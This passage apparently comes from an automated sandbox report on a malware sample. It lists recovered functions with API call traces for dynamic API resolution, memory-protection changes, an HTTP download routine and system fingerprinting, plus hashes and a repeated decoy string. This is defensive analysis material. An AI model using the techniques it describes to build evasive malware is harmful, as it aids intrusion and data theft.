                                      • GetProcAddress.KERNEL32(75B30000,01541878), ref: 00AD9E52
                                      • GetProcAddress.KERNEL32(751E0000,01541890), ref: 00AD9E73
                                      • GetProcAddress.KERNEL32(751E0000,01541848), ref: 00AD9E8B
                                      • GetProcAddress.KERNEL32(76910000,01548D10), ref: 00AD9EAD
                                      • GetProcAddress.KERNEL32(75670000,01535108), ref: 00AD9ECE
                                      • GetProcAddress.KERNEL32(77310000,01548A88), ref: 00AD9EEF
                                      • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00AD9F06
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00AD9EFA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 10ecc28808ca14c44160a2d07e3ab88860d408d195343c1fc6db4e28e8af52ed
                                      • Instruction ID: 101140edaec50780b0268f43a92999637e44ae1fa3e7883f7af06d17abbe9290
                                      • Opcode Fuzzy Hash: 10ecc28808ca14c44160a2d07e3ab88860d408d195343c1fc6db4e28e8af52ed
                                      • Instruction Fuzzy Hash: F8A1ECB5638300AFC344DFA9ED889567BB9AB4E705B10961BB90AD3374D7349940CF78
                                      Function 00AC4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 764 ac4610-ac46e5 RtlAllocateHeap 781 ac46f0-ac46f6 764->781 782 ac46fc-ac479a 781->782 783 ac479f-ac47f9 VirtualProtect 781->783 782->781
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC465E
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00AC47EC
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4693
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC476E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC471D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC467D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46D3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4688
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4667
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4707
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46FC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46B2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47AA
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47C0
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4779
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC478F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4763
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47CB
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4672
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46C8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC47B5
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC479F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4712
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4728
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4784
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46A7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC46BD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4638
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00AC4643
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeapProtectVirtual
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 1542196881-2218711628
                                      • Opcode ID: 208ead300b7c8d289108f5df4bc64cc23f3a9b0fc5b3b0d11fbaca04c379019d
                                      • Instruction ID: 41eafd1afeaa236b98df30502c47cc8974d017973da999b5f55d8cc97ed77c69
                                      • Opcode Fuzzy Hash: 208ead300b7c8d289108f5df4bc64cc23f3a9b0fc5b3b0d11fbaca04c379019d
                                      • Instruction Fuzzy Hash: 7E41F360BC3688FEC62ABBF6DC5DEAF77667F4AF1CF505C44AC2056282DB7059004526
                                      Function 00AC62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1033 ac62d0-ac635b call adaab0 call ac4800 call adaa50 InternetOpenA StrCmpCA 1040 ac635d 1033->1040 1041 ac6364-ac6368 1033->1041 1040->1041 1042 ac636e-ac6392 InternetConnectA 1041->1042 1043 ac6559-ac6575 call adaab0 call adab10 * 2 1041->1043 1044 ac654f-ac6553 InternetCloseHandle 1042->1044 1045 ac6398-ac639c 1042->1045 1061 ac6578-ac657d 1043->1061 1044->1043 1047 ac639e-ac63a8 1045->1047 1048 ac63aa 1045->1048 1050 ac63b4-ac63e2 HttpOpenRequestA 1047->1050 1048->1050 1053 ac63e8-ac63ec 1050->1053 1054 ac6545-ac6549 InternetCloseHandle 1050->1054 1056 ac63ee-ac640f InternetSetOptionA 1053->1056 1057 ac6415-ac6455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1044 1056->1057 1059 ac647c-ac649b call ad8ad0 1057->1059 1060 ac6457-ac6477 call adaa50 call adab10 * 2 1057->1060 1066 ac649d-ac64a4 1059->1066 1067 ac6519-ac6539 call adaa50 call adab10 * 2 1059->1067 1060->1061 1071 ac64a6-ac64d0 InternetReadFile 1066->1071 1072 ac6517-ac653f InternetCloseHandle 1066->1072 1067->1061 1076 ac64db 1071->1076 1077 ac64d2-ac64d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 ac64dd-ac6515 call adacc0 call adabb0 call adab10 1077->1080 1080->1071
                                      APIs
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                        • Part of subcall function 00AC4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AC4889
                                        • Part of subcall function 00AC4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AC4899
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      • InternetOpenA.WININET(00AE0DFF,00000001,00000000,00000000,00000000), ref: 00AC6331
                                      • StrCmpCA.SHLWAPI(?,0154FCB0), ref: 00AC6353
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AC6385
                                      • HttpOpenRequestA.WININET(00000000,GET,?,0154F530,00000000,00000000,00400100,00000000), ref: 00AC63D5
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AC640F
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AC6421
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AC644D
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AC64BD
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC653F
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6549
                                      • InternetCloseHandle.WININET(00000000), ref: 00AC6553
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET
                                      • API String ID: 3749127164-2509457195
                                      • Opcode ID: 32872349be7888e2a565b48e6ae0398175ab914c59bd1f690f38b5b6d2585c65
                                      • Instruction ID: f4b5b1148a252e0e7d830dd2b8177fb7eee30de2ee2cfd9f09d82d98266753d6
                                      • Opcode Fuzzy Hash: 32872349be7888e2a565b48e6ae0398175ab914c59bd1f690f38b5b6d2585c65
                                      • Instruction Fuzzy Hash: 96713C71A10318ABDB24DFA0CD59FEE7779BB44700F10819AF10AAB294DBB56E84CF51
                                      Function 00AD7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1356 ad7690-ad76da GetWindowsDirectoryA 1357 ad76dc 1356->1357 1358 ad76e3-ad7757 GetVolumeInformationA call ad8e90 * 3 1356->1358 1357->1358 1365 ad7768-ad776f 1358->1365 1366 ad778c-ad77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 ad7771-ad778a call ad8e90 1365->1367 1369 ad77a9-ad77b6 call adaa50 1366->1369 1370 ad77b8-ad77e8 wsprintfA call adaa50 1366->1370 1367->1365 1377 ad780e-ad781e 1369->1377 1370->1377
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00AD76D2
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00AD770F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7793
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD779A
                                      • wsprintfA.USER32 ref: 00AD77D0
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 1544550907-3809124531
                                      • Opcode ID: 4b555cbebe1bc113a1938c779328073fc5e5cbb1e5c4e3c6c93ea334e6108491
                                      • Instruction ID: d162383cfc882be4d63518ffdae1dd4c3e86eea27a22e22902e7878dedeae822
                                      • Opcode Fuzzy Hash: 4b555cbebe1bc113a1938c779328073fc5e5cbb1e5c4e3c6c93ea334e6108491
                                      • Instruction Fuzzy Hash: D94196B1D043589BDB14DF94DD45BDEB7B8AF08704F10419AF50AA7380E774AA44CFA5
                                      Function 00AD79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AC11B7), ref: 00AD7A10
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7A17
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00AD7A2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: f060a51157b437881a42e150c94e41a4d328603d3cb3c20f369c57d12e6b7223
                                      • Instruction ID: 7272d806265a1adbd44a96ea948908959aec8a60e557b65e0cbde074d371a30f
                                      • Opcode Fuzzy Hash: f060a51157b437881a42e150c94e41a4d328603d3cb3c20f369c57d12e6b7223
                                      • Instruction Fuzzy Hash: 8CF04FB1958309EBC704DF98DD45BAEBBB8FB05711F10065BF615E2780C77515008BA1
                                      Function 00AC1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: f3d96096a31c9bc1ba1b7eb70aa09216303c11d772468ba8727d9325dbff9aae
                                      • Instruction ID: 23c48ca32627e93b660ff7a55dddb05daeb3e624981846cd19317be5e1c4a9de
                                      • Opcode Fuzzy Hash: f3d96096a31c9bc1ba1b7eb70aa09216303c11d772468ba8727d9325dbff9aae
                                      • Instruction Fuzzy Hash: 66D05E74A0430C9BCB00DFE19949ADDBB78FB08215F00155AD905B2340EA305441CA75
                                      Function 00AD9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

